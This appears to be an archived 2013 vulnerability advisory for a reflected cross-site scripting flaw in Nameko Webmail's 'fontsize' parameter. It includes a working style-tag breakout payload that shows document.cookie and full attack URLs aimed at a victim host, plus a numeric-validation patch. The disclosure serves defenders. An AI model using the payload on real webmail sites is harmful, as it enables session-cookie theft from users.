Nameko Webmail Cross Site Scripting

Nameko Webmail Cross Site Scripting: Posted Jun 29, 2013; Authored by Andrea Menin; Nameko Webmail versions 0.10.146 and below suffer from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 3b2740074a19f52c84f779efae84cdd9f1a80d8cc1175eef3efe3108818db72a; Download | Favorite | View

Nameko Webmail Cross Site Scripting

* Nameko Webmail XSS Vulnerability on version <= 0.10.146
* ========================================================
*
* Homepage: http://www.wizshelf.org/nameko/
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================

Introduction:
-------------
Nameko is a set of tools for working with e-mails in PHP.
The core of Nameko is composed by a set of classes for
retrieve mail from a POP3 server, and parsing them to
get the body (both in plain text and HTML, if included)
and the attachments. Is included the NamekoWebmail, 
that is a powerful webmail.



Description:
------------
The XSS vulnerability is located on the credits page, where
is possible to change the font size by an http get request
(ex. fontsize=11). The "fontsize" variable write his content
inside a <style> tag that is possible to break and execute
any javascript inside a tag <script>. 

The URL for match the XSS, should be like (url-decoded): 

?fontsize=11pt;+}+</style><script>alert(document.cookie)</script><style>body+{+font-size:11




XSS URL:
--------
http[s]://** victim host **/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66

or

http[s]://** victim host **/?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66




Patch:
------
Is possible to patch this by make a check on the $_GET['FONTSIZE'] var,
making sure that it is numeric only.

// On file nameko.php (line 93):

  if($_GET[fontsize]) $_SESSION[FONTSIZE]=$_GET[fontsize];


// should be replaced with something like that:

  if(preg_match('/^[0-9]{2,2}$/', $_GET[fontsize])) {
    $_SESSION[FONTSIZE]=$_GET[fontsize];
  } else {
    $_SESSION[FONTSIZE]=11;
  }




CREDITS:
---------

This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)


LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Nameko Webmail Cross Site Scripting

Nameko Webmail Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Nameko Webmail Cross Site Scripting

Share This

Nameko Webmail Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems